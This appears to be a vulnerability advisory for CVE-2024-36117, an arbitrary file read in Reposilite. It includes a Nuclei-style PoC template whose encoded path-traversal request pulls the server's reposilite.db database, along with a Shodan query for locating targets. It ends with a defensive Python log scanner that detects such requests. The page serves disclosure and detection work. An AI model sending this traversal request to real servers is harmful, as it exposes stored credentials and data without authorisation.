CVE-2024-36117: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read

Date: 2025-08-01 | Affected software: Reposilite | PoC: public

Vulnerability description

Reposilite is an open source, lightweight and easy-to-use repository manager for Maven-based artifacts in the JVM ecosystem. Reposilite v3.5.10 is affected by an arbitrary file read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security Lab and is also tracked as GHSL-2024-074.

PoC code [public]

id: CVE-2024-36117

info:
  name: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.
  reference:
    - https://github.com/advisories/GHSA-82j3-hf72-7x93
    - https://github.com/dzikoysk/reposilite/commit/e172ae4b539c822d0d6e04cf090713c7202a79d6
    - https://github.com/dzikoysk/reposilite/releases/tag/3.5.12
    - https://github.com/dzikoysk/reposilite/security/advisories/GHSA-82j3-hf72-7x93
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36117
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-36117
    cwe-id: CWE-22
    epss-score: 0.6574
    epss-percentile: 0.98456
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1212523028
  tags: cve,cve2024,reposilite,lfi

variables:
  javadoc_path: "releases/javadoc/1.0.0/"

http:
  - raw:
      - |
        GET /javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"reposilite") && contains(body,"SQLite format")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 4a0a004730450221008779f56b73c9f0c0a97f6a25398a39c89522e6a0d4e0c45345176bccb2abfe67022032fcea702f002bd0b2cdd9256e6294fb0df29490ab069c9ed05dc0b440328759:922c64590222798bb761d5b6d8e72950
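Added example, not part of this advisory or of Reposilite's own code: a small log scanner that decodes request paths the way a defender reviewing access logs needs to (percent-decode, then treat the %5c backslash as a separator, since the PoC above mixes %5c and %2f) and flags any request whose decoded path contains a ".." segment, also reporting where the path would resolve. The log lines, the combined-format layout and the function names are constructed assumptions.

```python
import posixpath
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not from any real server.
# Line 2 carries the request path used by the PoC template above.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /javadoc/releases/javadoc/1.0.0/raw/index.html HTTP/1.1" 200 512
203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /javadoc/releases/javadoc/1.0.0/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1" 200 40960
203.0.113.9 - - [01/Aug/2025:10:00:03 +0000] "GET /releases/com/example/app/1.0.0/app-1.0.0.jar HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_request_path(raw: str) -> str:
    """Percent-decode until the string stops changing (bounded), then treat a
    backslash as a path separator so an encoded '..\\' counts as a '..' segment."""
    path = raw.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def classify_request(raw_path: str) -> Tuple[bool, str]:
    """Return (is_traversal, resolved_path). A request is a traversal attempt
    when its decoded path has a literal '..' segment; the resolved path shows
    where it would land relative to the web root after normalisation."""
    decoded = decode_request_path(raw_path)
    has_dotdot = ".." in decoded.split("/")
    return has_dotdot, posixpath.normpath(decoded)


def find_traversal_requests(log_text: str) -> List[str]:
    """Return the raw request paths in the log that look like traversal attempts."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and classify_request(m.group("path"))[0]:
            hits.append(m.group("path"))
    return hits


if __name__ == "__main__":
    for p in find_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", p, "->", classify_request(p)[1])
```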